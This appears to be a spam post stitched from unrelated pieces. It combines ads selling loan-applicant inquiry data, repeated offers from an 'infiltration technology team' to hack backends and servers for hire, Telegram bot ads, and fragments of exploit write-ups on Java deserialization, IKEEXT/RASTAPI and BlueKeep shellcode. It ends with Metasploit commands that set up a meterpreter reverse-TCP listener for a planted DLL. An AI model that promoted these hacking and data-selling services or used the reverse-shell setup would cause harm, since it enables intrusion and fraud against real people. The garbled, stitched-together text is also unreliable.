[New Inquiries Received]
China Merchants Bank Financial Services Inquiry Application (New)

Youqian Dan Inquiry Application (New)

Nan Yin Faba Inquiry Application

Ping An Loan Inquiry Application

Du Xiaoman Inquiry Application

360 Jiedian Inquiry Application

Output Quantity: 500

Large-scale Order Receiving with Effects Tested Multiple Times (5-12 Conversions)

Output Time: Orders can be delivered on the same day as they are reported, unless it's a very small city

Infiltration technology team, capable of infiltration, accessing the backend, modifying servers, conducting intrusions, etc.

consult；@comeblackgirl

Infiltration technology team, capable of infiltration, accessing the backend, modifying servers, conducting intrusions, etc.

consult；@comeblackgirl

When you enter, you can see that because the incoming cache is true, the mapping will associate the instance of the JdbcRowSetImpl object with the com.sun.rowset.JdbcRowSetImpl class. OK, the analysis of A ends here.

Let's use the RASTAPI module to demonstrate vulnerability exploitation. The IKEEXT service uses this module, so we can trigger event log behavior by initiating any VPN connection. The default settings of the relevant registry keys are as follows:

— 专业索引工具 · 整合海量信息资源 —

索引机器 @SUOBOT｜@SYJQ 专业的信息索引与搜索平台，能帮你快速发现、重要资讯，出海推广营销助手！telegram频道、群组、视频等内容收录检索。

— 专业索引工具 · 整合海量信息资源 —

索引机器 @SUOBOT｜@SYJQ 专业的信息索引与搜索平台，能帮你快速发现、重要资讯，出海推广营销助手！telegram频道、群组、视频等内容收录检索。

— 专业索引工具 · 整合海量信息资源 —

索引机器 @SUOBOT｜@SYJQ 专业的信息索引与搜索平台，能帮你快速发现、重要资讯，出海推广营销助手！telegram频道、群组、视频等内容收录检索。

超索 @ChaoSuoBOT  

让你轻松找到群组、频道、视频、音乐、电影、新闻！

👇点击下方按钮开始搜索👇

🔍项目搜索 @XMSSBOT 是一个TG项目对接平台，它可以找到你感兴趣的项目，资源，人脉，信息，渠道

After the vulnerability was exposed, the proof-of-concept (POC) was not released for a long time. The versions that could be successfully exploited were updated daily. There were several keywords related to the versions, including "51", "48", and "58", but it was unclear which one was the actual version. Therefore, I decided to check the official announcements first. I found that only the announcement for version 49 mentioned "enhanced security protection". So I started searching for versions 48 and 49 to look for commit logs, but I didn't find anything at that time.

The vulnerability trigger point is in termdd.sys. When the shellcode is executed, the IRQL is DISPATCH_LEVEL, which requires special handling. BlueKeep uses the shellcode of the module to implement the logic that is basically the same as Eternal Blue. Both first hook the syscall and then use APC injection to complete the transfer of R0 to R3. There is one difference. BlueKeep uses the egg hunter method to search for and copy the user-mode payload during the execution of the shellcode (due to the limited size of the data sent in a single virtual channel), while the offset position of the user-mode payload in Eternal Blue is fixed.
consult；@comeblackgirl

If the exploitation of the vulnerability is successful, the shellcode will be executed at the address termdd!IcaChannelInputInternal+17d.

consult；@comeblackgirl

Then copy it to the XP system and note the location, such as C:\s.dll
Run msf on Kali, with the specific commands as follows

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.232.134
LHOST => 192.168.232.134
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit
consult；@comeblackgirl